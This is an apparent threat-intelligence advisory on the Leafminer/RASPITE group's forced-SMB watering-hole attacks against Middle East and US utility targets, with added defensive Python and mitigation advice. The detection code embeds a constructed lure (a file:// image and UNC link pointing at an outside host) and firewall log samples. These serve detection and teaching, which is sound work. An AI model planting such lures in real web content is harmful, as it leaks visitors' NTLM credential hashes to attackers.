In July 2018, Symantec published research on the threat actor Leafminer, which had targeted government organizations and businesses in several verticals in the Middle East since at least early 2017. The report described several of the techniques the group used to breach targets. One was embedding “file://” URLs in compromised websites used as watering holes: when a Windows user visited such a page, the browser attempted to load the referenced resource over SMB from an attacker-controlled server, and Windows either prompted the user for credentials or authenticated automatically. Either way, the NTLM authentication exchange delivered the user’s NTLM hash (the challenge-response) to the attackers, who could then crack it offline to recover the password.
The report also described more conventional methods: brute-force and dictionary attacks against public-facing services, the EternalBlue (MS17-010) SMB exploit for lateral movement, and widely available tooling such as Mimikatz, PsExec and THC Hydra.
After that report was released, Dragos, a vendor specializing in ICS incident response, reported that it had observed the same activity group, which it tracks as “RASPITE,” targeting US entities in the utility vertical. Dragos noted that the group likewise uses embedded links that force an SMB credential exchange, indicating that US utilities may face watering-hole attacks like those seen in the Middle East.
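The forced SMB authentication described in both the Symantec and Dragos reports leaves two things a defender can look for: the lure itself (a `file://` URL or UNC path in web content that points at a host outside the organization) and the resulting outbound SMB connection from a workstation to an external address. The following Python is an added example, not code from Proficio, Symantec or Dragos; the HTML fragment, firewall log lines and log format are constructed for illustration, and `INTERNAL_NETS` stands in for the organization’s real address ranges.

```python
"""Spot forced-SMB-authentication lures in web content and the outbound SMB
connections they trigger in firewall logs.

Added example, not vendor code. All sample inputs below are constructed."""
import ipaddress
import re
from typing import List, Tuple

# Address ranges the (hypothetical) organization treats as internal. Membership
# is checked explicitly rather than via ipaddress.is_private, because Python
# also classifies the TEST-NET documentation ranges used below as "private".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]
SMB_PORTS = {445, 139}

# Constructed watering-hole page fragment. The 1x1 image and the link both
# point at an attacker-controlled host (TEST-NET address 203.0.113.5); a
# Windows browser loading them opens an SMB connection and authenticates.
# The last image uses a local drive path and must not be flagged.
SAMPLE_HTML = """
<html><body>
<h1>Regional Water Authority - Outage Map</h1>
<img src="/static/logo.png">
<img src="file://203.0.113.5/share/pixel.png" width="1" height="1">
<a href="\\\\203.0.113.5\\docs\\notice.pdf">Boil-water notice</a>
<img src="file:///C:/Users/Public/local.png">
</body></html>
"""

# Constructed firewall log in a hypothetical format:
# "<timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> <action>"
SAMPLE_FW_LOG = """\
2018-08-01T10:00:01Z 10.1.2.34:51522 -> 10.1.0.10:445 tcp allow
2018-08-01T10:00:03Z 10.1.2.34:51530 -> 203.0.113.5:445 tcp allow
2018-08-01T10:00:04Z 10.1.2.34:51531 -> 93.184.216.34:443 tcp allow
2018-08-01T10:00:07Z 10.1.2.35:49812 -> 198.51.100.7:139 tcp allow
"""

# file://HOST/... with a non-empty host (file:///C:/... has none), or a UNC path \\HOST\...
_FILE_URL = re.compile(r'file://(?P<host>[^/\\"\'>\s]+)/', re.IGNORECASE)
_UNC_PATH = re.compile(r'\\\\(?P<host>[^\\"\'>\s]+)\\')


def is_external(host: str) -> bool:
    """True if an SMB connection to `host` would leave the internal network."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Single-label names resolve via the internal DNS suffix or NetBIOS;
        # anything with a dot is treated as external (heuristic).
        return "." in host
    return not any(ip in net for net in INTERNAL_NETS)


def find_smb_lures(html: str) -> List[str]:
    """Return the unique external hosts referenced by file:// URLs or UNC paths."""
    hosts = set()
    for pattern in (_FILE_URL, _UNC_PATH):
        for match in pattern.finditer(html):
            host = match.group("host")
            if is_external(host):
                hosts.add(host)
    return sorted(hosts)


def find_outbound_smb(log_text: str) -> List[Tuple[str, str, int]]:
    """Return (src_ip, dst_ip, dst_port) for SMB connections to external hosts."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6 or fields[2] != "->":
            continue  # not a line in the expected format
        src_ip = fields[1].rsplit(":", 1)[0]
        dst_ip, dst_port = fields[3].rsplit(":", 1)
        if int(dst_port) in SMB_PORTS and is_external(dst_ip):
            hits.append((src_ip, dst_ip, int(dst_port)))
    return hits


if __name__ == "__main__":
    for host in find_smb_lures(SAMPLE_HTML):
        print(f"lure points at external SMB host: {host}")
    for src, dst, port in find_outbound_smb(SAMPLE_FW_LOG):
        print(f"outbound SMB {src} -> {dst}:{port} (possible NTLM hash leak)")
```

The log check is the more reliable of the two, since a lure can be obfuscated or injected by script while the workstation’s TCP 445/139 connection to an outside address cannot be hidden from the egress firewall. Blocking that outbound traffic at the perimeter stops the credential leak regardless of how the lure is delivered, and any attempts that are still logged point directly at the users whose passwords are now exposed to offline cracking.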
Dragos stated in its blog that it has no evidence the attackers have gained the ability to move into ICS systems after establishing a foothold in a utility, but assessed that they are likely gaining access to these organizations to prepare for a later ICS attack.
Proficio Threat Intelligence Recommendations:
- Require multi-factor authentication on any public-facing service where users authenticate; this blunts the brute-force and dictionary attacks described above and limits what a cracked password is worth.
- Keep Windows systems inside the network up to date, and confirm the MS17-010 patch that closes EternalBlue and the related SMB vulnerabilities is installed everywhere.
- Enforce a Windows password policy (length and complexity requirements, periodic changes); an NTLM hash leaked through a watering hole is only as useful to the attacker as the password behind it is weak.
Sources:
- Symantec findings for Leafminer
- Dragos details on RASPITE